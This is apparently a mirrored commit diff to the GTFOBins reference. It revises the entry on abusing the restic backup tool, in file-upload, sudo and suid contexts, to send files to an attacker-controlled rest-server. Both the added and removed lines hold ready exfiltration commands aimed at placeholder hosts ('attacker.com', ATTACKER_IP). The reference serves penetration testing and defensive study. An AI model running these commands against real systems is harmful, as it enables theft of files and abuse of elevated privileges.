mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Fix and improve restic
This commit is contained in:
parent
9ec96219a3
commit
7f6221646b
@ -1,18 +1,41 @@
|
||||
---
|
||||
description: |
|
||||
The attacker must setup a server to receive the backups, in the following example [rest-server](https://github.com/restic/rest-server/) is used but there are other options. To start a new instance and create a new repository:
|
||||
|
||||
```console
|
||||
RPORT=12345
|
||||
NAME=backup_name
|
||||
./rest-server --listen ":$RPORT"
|
||||
restic init -r "rest:http://localhost:$RPORT/$NAME"
|
||||
```
|
||||
|
||||
To extract the data from the restic repository in the current directory on the attacker side:
|
||||
|
||||
```console
|
||||
restic restore -r "/tmp/restic/$NAME" latest --target .
|
||||
```
|
||||
|
||||
Upload data to the attacker server with the following commands.
|
||||
functions:
|
||||
file-upload:
|
||||
- code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_or_dir_to_get
|
||||
NAME=backup_name
|
||||
restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"
|
||||
sudo:
|
||||
- description: Restic can be used to backup files. Run the commands in the sequence given below.
|
||||
code: |
|
||||
<!-- Attacker Machine -->
|
||||
rest-server --no-auth --listen http://ATTACKER_IP:PORT
|
||||
<!-- Victim Machine -->
|
||||
TARGET=rest_repository
|
||||
BACKUP=file_or_directory_to_backup
|
||||
sudo restic init -r rest:http://ATTACKER_IP:PORT/$TARGET
|
||||
sudo restic backup -r rest:http://ATTACKER_IP:PORT/$TARGET $BACKUP
|
||||
<!-- Attacker Machine -->
|
||||
TARGET=rest_repository
|
||||
DESTINATION=backup_to_restore
|
||||
mkdir /tmp/restic/$DESTINATION
|
||||
restic restore -r /tmp/restic/$TARGET latest --target /tmp/restic/$DESTINATION
|
||||
- code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_or_dir_to_get
|
||||
NAME=backup_name
|
||||
sudo restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"
|
||||
suid:
|
||||
- code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_or_dir_to_get
|
||||
NAME=backup_name
|
||||
./restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user